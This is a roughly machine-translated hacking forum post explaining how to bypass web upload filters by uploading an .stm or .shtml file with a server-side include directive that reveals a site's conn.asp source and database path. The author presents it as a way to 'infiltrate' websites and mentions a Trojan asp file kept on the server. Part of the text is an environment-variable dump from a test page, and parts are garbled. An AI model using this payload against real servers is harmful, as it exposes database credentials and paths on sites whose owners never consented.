I asked lcx about web upload a few days ago. When talking about using stm for upload and executing the program, I gave me a piece of code:
See the Code provided by lcx
Save it as stm or shtml and run the following command:
HTTP_ACCEPT: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-powerpoint, application/vnd. ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE: zh-cn HTTP_CONNECTION: Keep-Alive HTTP_HOST: localhost HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; maxthon ;. net clr 1.1.4322) HTTP_COOKIE: nbblastactivity = 1100263629; bblastvisit = 1100264583; bblastactivity = 1100265530; bbuserid = 1; bbpassword = Hangzhou; ASPSESSIONIDAQTSDRQQ = ~http_accept_encoding: gzip, deate
Current file name: F: \ Web \ 1.stm
Web server name and version: Microsoft-IIS/5.0
Host Name: localhost
Port: 80
Customer or customer Agent IP Address: 127.0.0.1
Customer or customer agent host name: 127.0.0.1
PATH_INFO value, but with a virtual path extended to a directory specification: F: \ Web \ 1.stm
The client provides the additional path information:/1.stm
Image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-powerpoint, application/vnd. ms-excel, application/msword ,*/*
I have never been puzzled!
Today, I saw a paragraph in the phantom brigade.
Reference
When the website does not allow uploading files such as asp cer cdx htr, upload an stm file with the following content:
<! -- # Include file = "conn. asp" -->
Directly request this stm file, and the conn. asp will be displayed at a glance, and the database path will be ready!
After reading the introduction of shtml, I suddenly realized that I finally understood it!
As mentioned above,
[Color = Green] <! -- # Include file = "conn. asp" -->
It is an SSI command, which serves to bring the content of "info.htm" to the front page. When a visitor visits the page, his htmldocument displays the content of info.htm. [/Color]
I tried it locally! A test. stm file is created under the my iis directory with the following content:
<! -- # Include file = "OK. asp" -->
Another Trojan file named OK. asp is stored in the same directory.
The request for test. stm in the browser is blank.
But when I checked the source code, I was so dizzy that it turned out to be the content of my asp file!
In this way, we can use this to obtain the conn file of the web to be infiltrated to obtain the database path,
But one premise is that the server has not deleted the stm or shtml extension!
Thanks again for the guidance of lcx!